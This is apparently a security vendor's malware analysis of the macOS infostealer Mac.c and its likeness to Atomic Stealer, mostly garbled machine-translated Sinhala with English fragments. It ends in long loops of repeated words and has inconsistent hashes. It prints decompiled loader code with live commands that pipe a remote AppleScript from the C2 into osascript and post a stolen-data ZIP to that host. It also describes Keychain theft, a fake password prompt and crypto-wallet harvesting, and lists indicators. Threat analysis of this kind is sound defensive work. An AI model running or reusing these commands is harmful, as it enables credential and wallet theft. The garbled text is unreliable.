Mac.c stealer takes on AMOS: A new rival shakes up the macOS Infostealer market

Mac.c හොරාගේ කතාව ආරම්භ වන්නේ ප්රධාන ප්රවේශයක් හෝ පිපිරීමක් සමඟ නොවේ.එය darknet ෆෝරූම්වල වහල් කොන්දේසි වලදී ආරම්භ වන අතර, 'mentalpositive' නමින් යන තර්ජනය ක්ෂේත් රයක් මුලින්ම වර්ධනය වූ අතර, අනෙකුත් හොරා සංවර්ධකයින්ගෙන් ඔහු වෙන් කර ඇති අසාමාන්ය චරිත කිහිපයක් සමඟ අවධානය යොමු කරයි. MacPaw හි සයිබර් ආරක්ෂක දෙපාර්තමේන්තුව පසුගිය මාස හතර තුළ mentalpositive අනුගමනය කර ඇත.We can already see that it is a new actor taking advantage of a macOS malware market that remains far less saturated than its Windows counterpart, marking the rise of the new wave of threat actors who are both technically skilled and commercially ambitious. MoonLock එක මෑතකදී පමණක් ක්රියාකාරී වුවද, Mac.c දැනටමත් විශාල, වඩාත් සවිස්තරාත්මක හොරු ක්රියාකාරකම් සමග තරඟකාරී වේ. ඒ වගේම ආසාදිතයින්ගෙන් විශාල මුදලක් ණය දෙනවා. එය වේගවත්, ඉහළ බලපෑම දත්ත හොරකම් සඳහා පරිශීලනය කරන ලද malware.As more URLs are added to its command-and-control infrastructure, Mac.c appears to be part of a larger underground ecosystem targeting macOS users. Atomic macOS Stealer ප් රදර්ශනය රොබෝ4 "මිනිස් ප්රතිඵලදායී" බෙදාගත් ප්රතිඵල යාවත්කාලීන කිරීම් සහ පවා Mac.c builds මත රැස් වූ ප්රතිචාරය - macOS malware සංවර්ධනයේ සාමාන්යයෙන් රහසිගත ලෝකයේ පුදුම විවෘතතාව මට්ටමකි. මෙම ලිපිය තුළ, අපි Mac.c සංවර්ධනය, mentalpositive ටැක්සි ඉවත්, සහ මෙම හොරා ඇපල් වේදිකාවන් ඉලක්ක කර ඇති තර්ජනයන් පුළුල් පෘථිවියට ගැලපෙන ආකාරය පරීක්ෂා කරමු. වෙළෙඳපොළේ නව ක් රීඩකයෙක් මාස හතරකට පමණ පෙර, Moonlock Lab මුලින්ම Mac.c හොරාගේ වර්ධනය අවබෝධ කර ඇති අතර එය "mentalpositive" යන නාමය යටතේ සංවර්ධකයාට ලියාපදිංචි කරන ලදී. අනෙකුත් තර්ජන ක්ෂේත් රයට සමානව, මනස ප්රතිඵලදායී මෘදුකාංග සංවර්ධනයේ නවතම ප්රතිඵල අනුගමනය කරයි: විවිධ කැම්පස්වල භාවිතය සඳහා මොඩියුලර් ආකෘතිය, උසස් සැකැස්වීමේ තාක්ෂණය සහ වඩාත් සංකීර්ණ command-and-control (C2) ආයුධ. කෙසේ වෙතත්, mentalpositive හි Mac.c හි ඉලක්ක ප්රවේශය සහ දත්ත පිටපත් කිරීමේ ප්රමාණය පෙනෙනු ඇත. එය iCloud Keychain ප්රවේශයන්, බ්රවුසරය තුළ තබාගත් මුරපදය, ක්රිප්රොප්ටෝට් ජංගම දුරකථන, පද්ධති මෙටා දත්ත සහ macOS හි විශේෂිත ස්ථාන වලින් දත්ත පවා ගබඩා කරයි - සියල්ල ෆිෂින් හරහා ලබාගත් ප්රවේශයන් භාවිතා කරයි. මහජන ගොඩනැගිල්ල තාක්ෂණික නිර්මාණය හැර, 'mentalpositive' අසාමාන්ය හැසිරීම් darknet ෆෝරෑම් හරහා ප්රදර්ශනය කර ඇත. මාස කිහිපයක් පුරා, මෙම තර්ජනය ක්රියාකාරයා Mac.c වෙත වර්ගීකරණ යාවත්කාලීන ප්රදර්ශනය කිරීම සඳහා underground ෆෝරෑම් එකක් භාවිතා කර ඇති අතර, ප්රමාණවත් පරිශීලකයන් සමඟ සන්නිවේදනය කිරීම සහ ක්රියාකාරීව ප්රතිපත්තිය ඉල්ලීම. එවැනි ප්රවෘත්ති දර්ශනය වැඩි කිරීමට සහ පැහැදිලි වෙළෙඳ ප්රදර්ශනය සකස් කිරීමට අදහස් දැක්විය හැක.එසේම, macOS තර්ජනය නයිස් වෙත සම්පූර්ණයෙන්ම ඉලක්ක කරන Custom stealer-as-a-service ව්යාපාරික ආකෘතිය සඳහා පදනම තැබීමට පෙනේ. නව විශේෂාංග ප්රකාශයට පත් කරන විට පහත දැක්වෙන රූපවාහිනී ඡායාරූප පෙන්නුම් කරයි.අපි මුල් පිටුව රුසියානු භාෂාවෙන් ලියා ඇති නිසා, අපි සෑම ඡායාරූපයක් සඳහා කෙටි පැහැදිලි කිරීමක් ඇතුළත් කර ඇත.පළමු රූපවාහිනී ඡායාරූපය සෑම මාසයකම ඩොලර් 1,500 ක් සඳහා හොරා යාවත්කාලීන කිරීම සඳහා ලියාපදිංචි වීමක් ඉදිරිපත් කරන ලද ප්රථම ප්රකාශයක් පෙන්වයි. පසුව, 'mentalpositive' Mac.c විශේෂාංග විස්තර විස්තරයක් බෙදා හදා. ඔවුන් අනුව, වඩාත්ම සැලකිය යුතු යාවත්කාලීන කිහිපයක් ඇතුළත් විය: මුල් Ledger Live යෙදුම මාරු කිරීම, ගොනු binary ප්රමාණය අඩු කිරීම (එක් වේගවත් බාගත කිරීම සඳහා සහ තත්වික විශ්ලේෂණය හරහා අවම වශයෙන් හඳුනාගත හැකි ආකෘති) සහ පරිපාලන පුවත සඳහා පරිශීලකත්වය. මෙම කොන්දේසි වලදී, මානසික ප්රතිඵලදායී සේවාදායකයන්, Mac.c හොරාගේ මිලදී ගැනුම්කරුවන් සඳහා අන්තර්ජාලය මත පදනම් වන පරිගණකයක් සලකයි.එවිට ඔවුන් malware builds නිර්මාණය කිරීමට ඉඩ සලසයි, ආසාදනය (සාර්ථක හා අසාර්ථක උත්සාහයන් ඇතුළත්) සහ අනෙකුත් ප්රවර්ධන විස්තර කළමනාකරණය කිරීමට ඉඩ සලසයි. මීට පෙර සඳහන් කළ පරිදි, 'mentalpositive' නිතරම ඔවුන්ගේ ෆෝරෝව සඟරාව යාවත්කාලීන කර ඇති බව පෙන්වීමෙන් ප්රතිඵලදායී පාරිභෝගිකයන් හවුල් කර ඇති බව පෙන්වන්න.එවැනි යාවත්කාලීන කිරීම සඳහා උදාහරණයක් පහත සඳහන් කර ඇත, තර්ජනය ක්රියාකාරයා 10.12.6 ට වඩා වැඩි macOS සංස්කරණවලට එරෙහිව හොරාගේ නවතම අනුවාදය පරීක්ෂා කර ඇති බව ප්රකාශ කරයි. ටොක්ස් සහ ජැබ්බර් දුරකථන අවසාන වශයෙන්, ලිවීමේ කාලය තුළ නවතම පණිවුඩය තවත් යාවත්කාලීන කිරීම් සකස් කරයි.මේවා ඇතුළත් කර ඇත XProtect මුල සිට සුවිශේෂී ගොඩනැඟිලි නිර්මාණය කිරීමෙන්, සහාය වන බ්රවුසරයන්ගේ පුළුල් ලැයිස්තුවක්, ෆයිල් ගබඩාව හරහා ෆයිල් ගබඩාව ක්රියාත්මක කිරීම, සහ වඩාත් ප්රසිද්ධව ෆිෂන් Trezor අමුද්රව්ය ප්රකාශයන් සඳහා විශේෂ මොඩියුලය. AMOS සමග සමානත්වය උදාහරණයක් ලෙස, තරඟකාරී හොරුන් පිටුපස ඇති සමහර සංවර්ධකයින් Mac.c කේතයේ ස්ථාවරත්වය ප්රශ්නය කර ඇති අතර, එය ප්රසිද්ධ Atomic macOS Stealer හි වෙනස් කරන ලද අනුවාදය විය හැකිය. Moonlock Lab විශ්ලේෂණය හා දෙකේම හොරාගේ නවතම ප්රතිලාභ අනුකූල කර ඇත, සහ AMOS විස්තර කෙරේ මෙම දෙකම සමාන කේතය කොටස් බෙදාහැරෙන අතර, 'mentalpositive' විසින් සකස් කරන කාර්ය සාධක වඩාත් සීමිත වේ. අපගේ නවතම ලිපි වලින් එකක් (රතු පාටින් ප් රදර්ශනය කර ඇත) AMOS SHA256: 54b9576aad25d54d703adb9a26feaa5d80f44b94731ff8ecff7cf1ebc15cf3ff මුලින්ම දැක්කා සුළඟට: 2025-06-19 20:18:55 ' (එළිදරව් කළු පාටින් සලකා බලමු) mentalpositive ප් රවර්ගය: 7dfd77f09a90d8d01a7d74a84685645622ae87a90b5dd72a5750daac9195c467 මුලින්ම දැක්කා සුළඟට: 2025-07-01 15:41:49 Mac.c සහ Atomic macOS Stealer අතර ක්රියාකාරකම් මට්ටමේ කේතය ප්රමාණවත්ව නැවත භාවිතයට පත් කරන ලදී.නමුත් සමහර අවස්ථාවලදී, ක්රියාකාරකම් වෘත්තීයව හෝ අවම වෙනස්කම් සහිතව පිටපත් කර ඇති බව පෙනේ. ක්රියාකාරීව, සොරකම්කරුවන් දෙදෙනාම, macOS පද්ධති මත සම්පූර්ණ දත්ත හොරකම් සඳහා නිර්මාණය කරන ලද සමාන විශේෂාංග සංකේතයක් බෙදා හදාගෙන ඇත.මේ දෙකේම අවස්ථාවලදී, මෙම හැකියාවන් ස්ථිර macOS මෙවලම් සහ ස්ක්රිප්ටින් භාවිතා කරමින් ක්රියාත්මක වන අතර, බාහිර ආකර්ෂණය අවම කර ගනුදෙනු වැඩි දියුණු කරයි. ඔවුන්ගේ බෙදාහැරෙන අභ්යන්තරයන් ellenére, AMOS දිගුකාලීනතාවය, මොඩියුලදායීතාවය සහ ඉලක්ක කිරීම සඳහා වැදගත් දියුණුවන් ඉදිරිපත් කරයි. Mac.c පරිගණකයේ පරිගණකයක් ලෙස ක් රියාත්මක වන අතර, Atomic macOS Stealer යනු වඩාත් දියුණු, ස්ථාවර සහ මොඩියුලීය තර්ජනයකි. කේතය නැවත භාවිතා කිරීමේ උසස් මට්ටමේ ප්රමාණවත් ප්රශ්න, නිර්මාණකරුවන් ප්රවේශය, සහ macOS ආකෘති සංවර්ධනය ක්ෂේත්ර තුළ ප්රමාණවත් සහයෝගීතාව පිළිබඳ ප්රශ්න සලසයි. 'mentalpositive's' මෙවලමක් අළුත් විය හැකි අතර, එය සම්පූර්ණයෙන්ම මුල් නොවන අතර, AMOS අද දකින වඩාත් දක්ෂ හා භයානක හොරා විකල්පය ඉතිරි වේ. Mac.c Stealer වැඩ කරන්නේ කෙසේද දැනටමත් සඳහන් කර තිබුණේ ඒ වන විට, ඔවුන්ගේ ක්රියාකාරී ඩොමේන් වෙනස් වී නැත: https://lagkill[.]cc. එය තුවාල අනුගමනය කිරීම සඳහා භාවිතා කරන PHP ගොනු සහ සමහර exfiltration ක්රියාකාරකම් ගබඩා කරයි. 'mentalpositive' Moonlock Lab වාර්තාව බොහෝ Mach-O ගොනු සම්බන්ධතා ඇත, නමුත් සාමාන්යයෙන් රැකියාව ක්රියාවලිය 2 පියවරට සකස් කළ හැක: Mach-O ආරම්භක executable සහ AppleScript payload. පියවර 1: Mach-O ආරම්භක executable Mac.c හොරකමක් මෙම පියවර කිහිපයක් ක්රියාත්මක කිරීම උපාය මාර්ගයක් භාවිතා කරයි, එහි පළමු පියවර පහසු ප්රවේශයක් ලෙස ක්රියාත්මක කිරීම සඳහා වගකිව යුතු වටිනාකමක් ප්රවේශය, පරිසර පිරිසිදු කිරීම, සහ ඊළඟ ප්රයෝජනවත් ප්රවේශය පාලනය කරනු ලැබේ. පහත මෙම පියවරේ විස්තරාත්මක බෙදාහැරීම වේ, උදාහරණ 90309fc3b90df1d7b6d7b6d747c5afa63fca6262721ce39c34da4b13901d53b919a3 මත පදනම්ව. undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } Mac.c input point (entry()) පටන් ගන්නේ දැනට පවතින ක්රියාවලිය forking කිරීමෙන් සහ setsid( හරහා නව සැසැස්මක් නිර්මාණය කිරීමෙන්, සාර්ථකව තමන්ව daemonizing කිරීමෙන්.This separates malware from any controling terminal and lets it run in the background. මීට අමතරව, freopen() භාවිතා කිරීමෙන් සියලුම සම්මත ඇතුලත්, ප්රතිදාන සහ වැරදි ප්රවාහයන් /dev/null වෙත මාරු කරන මූලික ක්රියාකාරීත්වය නිරීක්ෂණය කර ඇත.This neutralizes console output that could otherwise raise suspicion in debug logs or terminal monitors. මෙම මෘදුකාංගය command-and-control (C2) domain එක hardcod කරන ලදී: lagkill[.]cc. It also generates a unique victim identifier by concatenating multiple static hexadecimal strings.This results in a pseudo-unique txd token, used to fingerprint the infected host or to trace infection batches during C2 communication. මෙම පියවර තුළ ප්රධාන ක්රියාවලිය remote AppleScript බාගත කිරීම සහ ක්රියාත්මක කිරීමයි.This is achieved by chaining curl and osascript to download and immediately run the payload: curl -s https://lagkill[.]cc/src.php?txd= | osascript මෙම ක්රමයෙන් ආක් රමණිකයා ප්රයෝජනවත් ප්රවාහන වෙනස් කිරීමකින් තොරව ප්රයෝජනවත් ප්රවාහන යාවත්කාලීන කිරීමට ඉඩ සලසයි.This method allows the attacker to update the payload dynamically without modifying the loader, making attribution more difficult due to the indirect execution path. AppleScript ක්රියාත්මක කිරීමෙන් පසුව (එය නිසැකවම දේශීය දත්ත හොරකම් කිරීමක් සිදු කරයි), loader සාර්ථකත්වය පරීක්ෂා කරයි සහ එකම C2 සේවාදායකයට ZIP ලිපිගොනු පිටතට ප්රවේශ කරයි: curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd= " https://lagkill[.]cc/ මෙම ප්රවේශය Custom headers (cl: 0) සහ වේගවත් පද්ධති ප්රමාණවත් කිරීමට ප්රමාණවත් timeout භාවිතා කර ඇත, මෙහෙයුම් ස්ථාවරත්වයට අවධානය යොමු කිරීමට යෝජනා කරයි. පියවර 2: AppleScript payload Mac.c හොරාගේ දෙවන පියවර වන්නේ සැබෑ හානි ආරම්භ වන ස්ථානයයි.AppleScript ප් රයෝජනවත් ප්රමාණයක් ස්කයිප් කිරීම සඳහා ස්ථාවර macOS ස්කයිප් කිරීමේ හැකියාවන් ආකර්ෂණය කරන අතර, සංවේදී දත්ත විශාල ප්රමාණයක් ලබා ගැනීම සඳහා එය සාර්ථක වේ. පහත දැක්වෙන්නේ, දෙවන පියවරේ ප්රතිලාභ ප්රමාණයේ තාක් ෂණය ප්රවර්ගය අනුව බෙදා හැරීමයි. Credential theft & CLI abuse මෙම ස්ක් රිප්ටරය පාවිච්චිකයාගේ මුරපදය ඉල්ලන බොරු පද්ධති ප් රවේශයක් ආරම්භ කරයි.This is stored in plaintext and reused later. පසුව එය නිහඬව ආරක්ෂක CLI පරිශීලකතාවය භාවිතා කරයි Keychain වලින් ඉතිරි කර ඇති ප්රවේශයන් ඉවත් කිරීම සඳහා, විශේෂයෙන් Google Chrome සහ Chromium මත පදනම්ව යෙදුම් ඉලක්ක කරයි. ලබාගත් දත්ත /tmp / / Password ලෙස ලියනු ලැබේ. මෙම ෆිෂන් උපායමය ස්ථාවර විශ්වාසය සහ අසාමාන්ය macOS පරිගණකයන් භාවිතා කිරීමෙන් පරිශීලකයන්ගේ සංකීර්ණතාවය නොසලකා බැලිය හැකිය. Browser and extensions data theft Chrome, Edge, Brave සහ Yandex යන පරිශීලකයන් ඇතුළත් වේ. පිටපත් කර ඇති ගොනු ඇතුළත් වේ: login data, cookies, web data, IndexedDB storage. අවසාන වශයෙන්, ස්ක්රිප්ට් දහස් ගණනක් ප්රසිද්ධ crypto wallet පුළුල් කිරීම් හරහා ක්රියාත්මක කරයි - වැනි MetaMask, Phantom, සහ Binance Wallet - හා දේශීය ගබඩා ගොනු හෝ සැසැස්ම ප්රතිඵල. මුළු බ්රවුසර සම්බන්ධ මාලාවක් /tmp/ /Browsers/ යටතේ සංවිධානය කර ඇත. Hot wallet and crypto app harvesting ප්රයෝජනවත් බර ස්කෑන් ප්රසිද්ධ ඩෙස්ක්ටොප් ක්රිප්ටොප් ජංගම දුරකථන ප්රවේශය සඳහා, ඇතුළත්: විදුලි පිටතට Coinomi Atomic මුදල් Wasabi Ledger සජීවී wallet ගොනු සහ සැකසුම් දත්ත බැංකු වැනි අදාළ දත්ත (උදාහරණයක් වශයෙන්, LevelDB ලිපිගොනු) /tmp/ /Cryptowallets/. මෙය පැහැදිලි මූල් යමය උනන්දුවක් සලසයි, macOS crypto-enthusiast පරිශීලක පදනම වෙත අවධානය යොමු කර ඇත. File-grabber and its logic පුහුණු වටිනාකම උපරිම කිරීමට සහ පඩිපෙල අවම කිරීම සඳහා, ස්ක්රිප් එක පහත දැක්වෙන දේ කරයි: පරිශීලකයාගේ Desktop, Documents, and Downloads ෆෝල්ඩරයට නැවත සොයයි. උසස් වටිනාකම ගොනු වර්ග සඳහා ෆයිල්ටර්: .wallet, .seed, .txt, .keys, .pdf, .docx. ෆයිල් ප්රමාණය සීමාව ~10MB මෙම ප්රවේශය අවම ශබ්ද, ඉහළ සංඥා ගොනු ප්රමුඛත්වය ඇතුළත්, ප්රතිලාභ අමුද්රව්ය, ප්රතිලාභ යතුරු, හා සංවේදී PDFs. Collection of messaging and app artifacts Mac.c tdata මාතෘකාව පිටපත් කරයි, එය ක්රියාකාරී සැසැස්වීමේ ටෝකන් හෝ සකසන පණිවිඩ (Telegram සමඟ සම්බන්ධ වන ඒවා) ඇතුළත් විය හැකිය. Binance සහ Ton Keeper යෙදුම් වලින් සැකසුම් ගොනු ප්රදර්ශනය කරනු ලැබේ, මුදල් ජංගම දුරකථන භාවිතය, ලියාපදිංචි වීමේ ආකෘති හෝ ගබඩා කර ඇති ප්රධාන පිළිබඳ දර්ශනයක් ලබා දීම. system_profiler, macOS සහ Display දත්ත එකතු කිරීම සඳහා සාමාන් ය භාවිතය. මෙම පුළුල් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර්ෆියුම් පර් Archiving and exfiltration සියලුම එකතු කරන ලද දත්ත ව්යුහගත තාවකාලික ලිපිනයකට /tmp/ /. -c -k භාවිතා කිරීමෙන්, macOS හි ස්ථාවර ඇසුරුම් මෙවලම, සම්පූර්ණ මාතෘකාව /tmp/osalogging.zip බවට ziped වේ. ලියාපදිංචි කිරීමෙන් පසු, ප් රයෝජනවත් ප්රමාණය පිටතට එයි. පසුබිම පරීක්ෂා කිරීම හෝ නැවත සිදු කිරීමක් නැත. මෙම සැඟවුණු අවධානය යොමු කරන ලද, කාලගුණික සැලසුම වේගවත් කැපීම සහ ගබඩාව ක්රියාකාරීත්වය සඳහා පෙන්වනවා, සමහර විට එක් වරක් ප්රවේශය සඳහා හෝ විශාල ආසාදන කඳවුරක කොටසක් ලෙස සැලසුම් කර ඇත. Phishing ක් රමය 'mentalpositive' හි දෙවන තත්වයේ ප්රතිලාභ ප්රමාණයේදී භාවිතා කරන විශේෂයෙන් වංචාකාරී තාක්ෂණයක් වන්නේ ක්රීඩාව බලපත්ර ඉල්ලීමක් ලෙස හැඳින්වූ ව්යාජ පද්ධති ප්රශ්නයකි. ඔයාගේ ෆයිල් එක බේරගන්න.” අහිංසක මැජික් මීට අමතරව, එවැනි payloads ‘innocent’ (හෝ, සමහර අවස්ථාවලදී, ‘innocent’) ගොඩනැගිල්ල ටැග් සමග පැමිණෙන අතර, මෙම විශේෂිත ව්යාපාරයට සම්බන්ධ ආසාදන හඳුනා ගැනීම සඳහා යොදා ගත හැකිය. අවසාන වශයෙන්, මෙම ව්යාපාරය සඳහා විශේෂයෙන් කුලියට පත් කරන ලද ඩොමේන් එක innocentwitches[.]top වන අතර, root URL Google වෙත මාරු කරයි, එය /upload.php මාර්ගය ද ඇතුළත් වන අතර, තර්ජනය ක්රියාකාරයාට සොරකම් කළ දත්ත ලබා ගැනීමට ඉඩ සලසයි. ප් රතිඵල මැක් පරිගණක සාමාන්ය පරිශීලකයන් සහ විශේෂයෙන් ක්රොප්ටොප් අයිතිකාරයන් අතර ජනප්රියත්වය වර්ධනය වන අතර, අප අපේක්ෂා කරන්නේ හොරුන්ට ඔවුන්ගේ හැකියාවන් පමණක් නොව ඔවුන්ගේ වෙළෙඳ කොටස් සහ බලපෑම මත ප්රමාණවත් වනු ඇත. Mac.c යනු තනි සිද්ධියක් නොවේ, නමුත් වෘත්තීය macOS ආකර්ෂණීය මෘදුකාංග සංවර්ධනය සඳහා වර්ධනය වන වර්ධනයක කොටසක් වන අතර එය ප් රසිද්ධ Atomic Stealer හි ප්රධාන කාර්යයන් සහ ආකෘති අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අමුද්රව්ය අප දකින දේ වන්නේ නව ව්යාපාරික ආකෘතිය වර්ධනය වීමයි: stealer-as-a-service, විශේෂයෙන් macOS පරිශීලකයින්ට ඉලක්ක කර ඇති අතර, වඩාත් පුළුල් malware-as-a-service කර්මාන්තයෙන් පිටතට පිවිසෙනු ඇත. IOC https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php 7fd77f09a90d8d01a7d74a84a685645622ae87a90b5dd72a5750daac9195c467 33e9b605406ffb779dc912a1ce66436a8867b88e087bc34b2b2b2fca2160b64ca7 ප් රචණ්ඩත්වයේ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බු ප් රචණ්ඩත්වයේ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක් වූ අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බුදයට ලක්වන අර්බු